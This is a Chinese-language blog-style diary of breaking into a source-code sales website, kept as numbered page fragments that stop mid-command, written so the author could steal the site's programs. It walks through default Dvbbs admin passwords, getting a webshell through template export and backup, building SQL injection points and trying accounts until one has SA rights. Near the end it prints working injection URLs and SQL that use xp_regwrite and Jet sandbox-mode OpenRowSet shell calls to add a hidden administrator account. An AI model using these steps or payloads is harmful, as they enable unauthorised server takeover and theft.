艱難滲透源碼銷(xiāo)售站點(diǎn)

1、艱難滲透源碼銷(xiāo)售站點(diǎn)題外話(huà):最近想做幾個(gè)垃圾站玩玩?？墒稚嫌譀](méi)有啥好程序。郁悶。那些網(wǎng)上免費(fèi)的程序又沒(méi)多少好玩意。百度看看網(wǎng)上誰(shuí)賣(mài)程序。方便的話(huà),搞幾個(gè)下來(lái)玩玩好了。一:小碰頭:百度上找了一會(huì), HYPERLINK / /看到這個(gè)站上有幾個(gè)我喜歡的程序。咋辦?試試看吧。當(dāng)時(shí)一看這站,哪像個(gè)出售源碼程序的站。這么丑。用的啥系統(tǒng)我想大家不說(shuō)我說(shuō)也知道了吧。當(dāng)然,人家手上既然有這么多源碼,想必也是通過(guò)自己的入侵手段搞來(lái)的。那他的主站也基本上就不需要看了。隨便在一個(gè)url上添加個(gè)單引號(hào)出現(xiàn)了這個(gè)。加了防注入了.算了。不錯(cuò)主站入手了。拿出我們最喜歡的東西吧。 HYPERLINK /ip-domains.

2、html /ip-domains.html( HYPERLINK /ip /ip)查到同一服務(wù)器上有這些站。有53個(gè)站。心里開(kāi)心了。旁注有望啊。從主站也得知這些網(wǎng)站都是網(wǎng)站管理員的出售中的程序。所以給他們分配的也都是2級(jí)域名。大家會(huì)想了。2級(jí)域名?會(huì)不會(huì)如果直接搞定一個(gè)webshell,就可以得到所有程序呢?因?yàn)樗麄冞@些演示站點(diǎn)或許會(huì)是在主站的下級(jí)目錄吧。當(dāng)初我也這么想的。先不說(shuō)這個(gè)了。下面我們開(kāi)始吧。我首先瞄準(zhǔn)了 HYPERLINK / /大家看到了什么?對(duì),論壇。而且是動(dòng)網(wǎng)7.1的。不是吧?這么簡(jiǎn)單就可以搞到一個(gè)webshell了？還賣(mài)源碼呢.唉。動(dòng)網(wǎng)默認(rèn)的密碼就進(jìn)去了。咱們登陸后臺(tái)拿we

3、bshell吧。Dvbbs7.1首先考慮后臺(tái)導(dǎo)出模板然后備份拿webshell.然后就導(dǎo)出了。問(wèn)題也就來(lái)了。去看看備份數(shù)據(jù)庫(kù)那里能否備份。是可以備份的。導(dǎo)出模板不可以。上傳文件總還是會(huì)允許的吧?結(jié)果無(wú)論我上傳什么類(lèi)型的文件。無(wú)論我怎么偽造文件。都顯示這個(gè)。難怪管理員會(huì)這么放心的把密碼設(shè)為默認(rèn)的。我想大概是方便購(gòu)買(mǎi)的人查看吧。想了想。要是這樣的話(huà)?那不會(huì)所有的2級(jí)網(wǎng)站都是這樣吧？我是個(gè)不服輸?shù)娜?。大不了一個(gè)一個(gè)試。不就53個(gè)網(wǎng)站么？經(jīng)歷了“無(wú)數(shù)”的數(shù)據(jù)庫(kù)只讀,無(wú)寫(xiě)入權(quán)限等問(wèn)題。幾乎所有的2級(jí)都是這樣。看來(lái)管理員還是挺有意識(shí)。尷尬了。怎么辦？不會(huì)就這么放棄吧。二：峰回路轉(zhuǎn)。我沒(méi)有放棄。接著又找到一

4、動(dòng)網(wǎng)7.1默認(rèn)密碼。 HYPERLINK /BBS/ /BBS/哈哈。百密終有一疏啊。這么多的站?？偹氵€有一個(gè)沒(méi)把權(quán)限給卡住啊。成功導(dǎo)出后。然后通過(guò)備份拿到一個(gè)webshell.終于嘆了口氣。搞了大半天終于拿到了一個(gè)webshell.提權(quán)吧。無(wú)ws無(wú)任何第3方可以直接利用軟件。Aspx的馬馬運(yùn)行不了(其實(shí)服務(wù)器是支持.net的)。跳轉(zhuǎn)的d:/web/ 跳轉(zhuǎn)不了唉。提權(quán)無(wú)望啊。又不知道其他目錄的名稱(chēng)。社工了好幾個(gè),都不能跳轉(zhuǎn)。想了想,同級(jí)目錄會(huì)不會(huì)允許跳轉(zhuǎn)呢?帶著僥幸的心理嘗試了下。大家會(huì)說(shuō)了,根本就不知道其他的網(wǎng)站目錄其實(shí)要想知道一個(gè)同級(jí)目錄也不難。剛剛咱們不是還有個(gè)動(dòng)網(wǎng)默認(rèn)密碼的沒(méi)搞下來(lái)么?

5、大家有沒(méi)想到什么？動(dòng)網(wǎng)后臺(tái)在數(shù)據(jù)處理的系統(tǒng)信息檢測(cè)可以看到網(wǎng)站的路徑的。呵呵。對(duì)了。(其實(shí)還有的其他幾個(gè)站點(diǎn)可以通過(guò)aspcheck.asp來(lái)得知的。)哈哈。跳轉(zhuǎn)成功。但也就只能跳這個(gè)三級(jí)目錄。不過(guò)不要緊。舒服的東西在下面呢。習(xí)慣性的看了下數(shù)據(jù)庫(kù)連接文件。strconn = driver=sql server;server=(local);uid=xxx;pwd=xxx;database=xxx呵呵。是個(gè)SQL的數(shù)據(jù)庫(kù)。試試是否可以上傳文件到這個(gè)站。唉。權(quán)限還是不夠啊。那就用SQLtool直接連接吧。我暈。怎么可能呢?密碼難道錯(cuò)誤?不會(huì)啊。重新找了一下數(shù)據(jù)庫(kù)連接我文件。也就那么一個(gè)。那到底怎么

6、回事呢?很明顯,禁止了外部連接1433端口。如果是這樣的話(huà)那好辦。傳個(gè)SQLrootkit就可以了。事實(shí)證明了這一點(diǎn)。我用webshell自帶的SQL連接工具連接了。在我意料之中。這僅僅是個(gè)db權(quán)限的數(shù)據(jù)庫(kù)而已。Db權(quán)限的數(shù)據(jù)庫(kù)？大家想到了什么？呵呵。對(duì)了。Db 權(quán)限的注入點(diǎn)可以列目錄啊。既然服務(wù)器允許我們跳轉(zhuǎn)到3級(jí)目錄(這只是暫時(shí)的猜想,因?yàn)楫吘箷簳r(shí)只有一個(gè)3級(jí)目錄被我們跳轉(zhuǎn)了)。XP_CMDSHELL. 存在!SP_OACREATE. 存在!XP_REGWRITE. 存在!XP_SERVICECONTROL 存在!經(jīng)查詢(xún)。這些都還在。那就好辦了。直接構(gòu)造注入點(diǎn)吧。這里的admin必須是一個(gè)

7、存在的表名。我們可以通過(guò)SQL連接工具執(zhí)行SQL命令查詢(xún)。select name from sysobjects where type=U查詢(xún)出我們需要的表名。或者我也在 ./conn/encode.asp這個(gè)文件里找到這一句。sql=select count (*) from login where id=&cint(myid)很明顯。這里的login就可以被我們用上。strSQL = select * from login where id= & id 我們構(gòu)造出這樣的語(yǔ)句替換到上面的代碼中。至此。終于有了突破。成功構(gòu)造了注入點(diǎn)。呵呵。能夠列出目錄了。我們現(xiàn)在會(huì)想。要想搞到3389的終極權(quán)

8、限。現(xiàn)在只能靠1433這個(gè)口子了。既然服務(wù)器支持我們跳轉(zhuǎn)到某些目錄。那咱們一一試過(guò)去不就行了。事情證明。找1433實(shí)在是太辛苦了。有的人大概會(huì)一個(gè)目錄一個(gè)目錄的去找吧。但有的網(wǎng)站只是access的。其實(shí)這也是我當(dāng)初的做法。后來(lái)兄弟可酷可樂(lè)告訴我。直接列出這個(gè)目錄d:Program FilesMicrosoft SQL ServerMSSQLData數(shù)據(jù)庫(kù)的前綴基本上是有規(guī)律的。那就是跟二級(jí)域名很相似。直接去找那些目錄就可以了。這樣就可以省下很多事。找到目錄后,一一的在webshell上跳轉(zhuǎn)。很順利。在通過(guò)幾次觀(guān)察后。管理員把SQL帳戶(hù)設(shè)置的很有規(guī)律。aaa1 aaa2 aaa3 aaa4 aa

9、a5 而密碼有都是一樣的。我這個(gè)人就是懶,喜歡偷懶。那這些用戶(hù)中會(huì)否有一個(gè)是SA的權(quán)限呢？趕緊去一個(gè)一個(gè)試。我從aaa1試到aaa16。呵呵。恭喜！SQL SERVER最高權(quán)限。還等什么？趕緊”net user” 吧。xpsql.cpp: 錯(cuò)誤 5 來(lái)自 CreateProcess（第 737 行）郁悶了。出現(xiàn)了這樣的情況。沒(méi)有足夠的權(quán)限創(chuàng)建進(jìn)程。難道不是SA權(quán)限? SA都被降權(quán)了?c: HYPERLINK / windowssystem32cmd.exe沒(méi)有被刪啊那怎么辦？想要用SQL查詢(xún)分析器連接吧，但1433又不對(duì)外開(kāi)放。外部不可以連接。想把服務(wù)器上的1433端口轉(zhuǎn)發(fā)到本地吧。又無(wú)ws.

10、網(wǎng)上查了查資料。用沙盒模式提權(quán)來(lái)試下再來(lái)構(gòu)造個(gè)個(gè)SA的注入點(diǎn)。這不難。繼續(xù)構(gòu)造。再次執(zhí)行select name from sysobjects where type=U查詢(xún)myadmin這個(gè)數(shù)據(jù)庫(kù)中的表名。好了。成功構(gòu)造出來(lái)了。接著就是沙盒模式提權(quán)了。 HYPERLINK /Manage/Include/sql.asp?id=1;EXEC%20master.dbo.xp_regwrite%20 /Manage/Include/sql.asp?id=1;EXEC%20master.dbo.xp_regwrite%20HKEY_LOCAL_MACHINE,SoftWareMicrosoftJet4

11、.0Engines,SandBoxMode,REG_DWORD,0;- HYPERLINK /Manage/Include/sql.asp?id=1;Select /Manage/Include/sql.asp?id=1;Select*From OpenRowSet(Microsoft.Jet.OLEDB.4.0,;Database=c: HYPERLINK / windowssystem32iasias.mdb,select shell(net user aloner$ aloner /add);- HYPERLINK /Manage/Include/sql.asp?id=1;Select*

12、From /Manage/Include/sql.asp?id=1;Select*From OpenRowSet(Microsoft.Jet.OLEDB.4.0,;Database=c: HYPERLINK / windowssystem32iasias.mdb,select shell(net localgroup administrators aloner$ /add);-返回正常。說(shuō)明成功了。或者用HDSI 執(zhí)行下面這些SQL命令。EXEC master.dbo.xp_regwrite HKEY_LOCAL_MACHINE,SoftWareMicrosoftJet4.0Engines,SandBoxMode,REG_DWORD,0Select * From OpenRowSet(Microsoft.Jet.OLEDB.4.0,;Database=c: HYPERLINK / windowssystem32iasias.mdb,select shell(net user aloner aloner /add);Select * From OpenRowSet(Microsoft.Jet.OLEDB.4.0,;Database=c: